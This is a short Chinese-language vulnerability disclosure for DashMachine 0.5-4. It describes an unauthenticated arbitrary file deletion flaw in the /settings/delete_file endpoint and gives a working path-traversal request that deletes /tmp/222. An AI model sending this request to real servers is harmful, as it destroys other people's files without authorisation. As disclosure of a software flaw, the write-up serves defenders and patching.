项目链接

rmountjoy92/DashMachine: Another web application bookmark dashboard, with fun features. (github.com)

影响版本

0.5-4 docker

漏洞过程

DashMachine的/settings/delete_file接口未对file参数进行过滤，攻击者可在未登录的情况下删除服务器上的任意文件。

先在服务器上创建”/tmp/222”文件：

在未登录的情况下发送恶意请求，可删除该文件：

/settings/delete_file?folder=icons&file=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/222

服务器上查看/tmp目录下的文件列表，发现”/tmp/222”已删除